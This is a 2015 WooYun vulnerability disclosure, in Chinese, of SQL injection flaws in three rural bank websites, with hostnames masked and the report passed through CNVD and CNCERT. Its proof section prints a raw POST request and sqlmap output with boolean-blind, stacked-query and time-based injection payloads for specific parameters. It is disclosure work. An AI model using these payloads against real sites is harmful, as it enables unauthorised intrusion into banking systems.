当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145544

漏洞标题:三个农商行一些漏洞打包

相关厂商:农商行

漏洞作者: 路人甲

提交时间:2015-10-09 18:14

修复时间:2015-11-27 18:00

公开时间:2015-11-27 18:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-09: 细节已通知厂商并且等待厂商处理中
2015-10-13: 厂商已经确认,细节仅向厂商公开
2015-10-23: 细节向核心白帽子及相关领域专家公开
2015-11-02: 细节向普通白帽子公开
2015-11-12: 细节向实习白帽子公开
2015-11-27: 细节向公众公开

简要描述:

人生有太多的意外事情,我的心好难受..可是必须残酷面对。

详细说明:

详细说明见漏洞证明。

漏洞证明:

只证明漏洞存在,拖库我不擅长也不是我的爱好。
(1)湖商村镇银行(http://**.**.**.**)
POST型SQL注入,构造如下POST数据,sid参数存在注入

POST /search.jsp HTTP/1.1
Content-Length: 58
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: JSESSIONID=rBABAR-QVg08ecQlwZnLc0cnskwx-cWpSDAA
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Page=0&sid=502&topic=1


测试结果:

sqlmap identified the following injection points with a total of 262 HTTP(s) requests:
---
Place: POST
Parameter: sid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Page=0&sid=502 AND 5798=5798&topic=1
---
web server operating system: Windows 2003 or 7
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Microsoft SQL Server 2008


(2)黑河农商行(http://**.**.**.**)
注入点:http://**.**.**.**/Web_XXXX.aspx?InfoID=1,翻到这个页面直接报错,于是顺手测试下。

sqlmap identified the following injection points with a total of 116 HTTP(s) requests:
---
Place: GET
Parameter: InfoID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: InfoID=1' AND 1269=1269 AND 'MIcX'='MIcX
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: InfoID=1'; SELECT SLEEP(5)-- 
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: MySQL 5.0.11


(3)泉州农商行(**.**.**.**)
注入点:**.**.**.**/business.aspx?cid=-1 ,参数后面加个'报错了

泉州1报错.png


来吧继续给个测试结果

sqlmap identified the following injection points with a total of 112 HTTP(s) requests:
---
Place: GET
Parameter: cid
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)
    Payload: cid=(SELECT (CASE WHEN (3262=3262) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 3262 END))
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005


OK,说完了。

修复方案:

银行系统没理由不重视。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-10-13 17:58

厂商回复:


CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置. 同步发给对应多个分中心.rank 14

最新状态:

暂无